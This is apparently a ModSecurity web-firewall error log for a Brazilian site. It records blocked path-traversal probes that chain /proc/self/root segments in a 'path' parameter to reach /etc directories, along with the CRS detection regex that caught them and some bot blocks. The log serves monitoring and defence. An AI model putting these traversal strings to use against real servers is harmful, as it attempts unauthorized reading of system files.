https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:12:08.758642 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:44700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrO2CmAPhZkrhU8w4mHAwAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:12:13.323113 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:38838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrO3UzinOy1jxa1j4cvzwAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:12:28.825831 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:38844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrO7Mdf6f5d65gmYZTuBwAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:12:31.000529 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.241.31:35674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrO7gbLMZ6AikZjR9XZkwAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:12:39.875646 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:41494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrO9tY0UrI5A3LftIzNegAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:12:54.163951 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.241.31:44572] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrPBkzinOy1jxa1j4cv8AAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:14:06.894975 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.228.61:49794] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrPTimAPhZkrhU8w4mHOQAAAJY"]
[Wed Mar 18 13:14:09.986370 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.244.43:55982] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrPUSmAPhZkrhU8w4mHPAAAAJg"]
[Wed Mar 18 13:14:37.204512 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:47234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrPbeoXxyEfFpUF8f-HhQAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:14:50.957077 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:55040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrPeta6ubjKNq_cu4a3bQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 13:14:59.092915 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:38268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrPg-yqAr6etmhZHNrgAQAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:15:10.864495 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.241.31:44472] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrPjuw_le52K8_3pV34VgAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:15:12.986992 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:49214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrPkMdf6f5d65gmYZTufwAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:16:06.527815 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:46744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrPxuoXxyEfFpUF8f-H6wAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:16:13.365952 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:52936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrPzQbLMZ6AikZjR9XZ8gAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:16:15.815482 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:37312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrPzwkwaGbbGflqUZAq2QAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:16:19.347468 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:37314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrP0ymAPhZkrhU8w4mHlwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:17:35.763023 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:58898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrQH_u8EFLIOrSqIpsdHwAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:17:47.590330 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.241.31:50392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrQK0zinOy1jxa1j4cwqAAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:19:06.903051 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.228.61:37506] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrQeta6ubjKNq_cu4a4hwAAA0E"]
[Wed Mar 18 13:19:09.771238 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.244.43:36028] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrQfSmAPhZkrhU8w4mIBAAAAIw"]
[Wed Mar 18 13:19:51.877916 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:50774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrQp9a6ubjKNq_cu4a47gAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:20:11.548948 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.241.31:53524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrQuuw_le52K8_3pV346gAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:20:28.263704 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:49642] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrQzMdf6f5d65gmYZTvCwAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
